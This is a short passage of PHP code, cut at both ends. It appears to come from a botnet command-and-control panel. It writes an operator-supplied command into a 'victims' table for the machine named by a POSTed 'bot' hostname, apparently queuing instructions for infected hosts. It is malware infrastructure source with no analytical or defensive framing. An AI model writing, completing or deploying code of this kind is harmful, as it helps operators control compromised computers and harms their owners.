prepare("update victims set command=? where hostname=?"); $setCommand->bind_param("ss",$_POST["command"], $_POST["bot"]); $setCommand->execute(); } ?>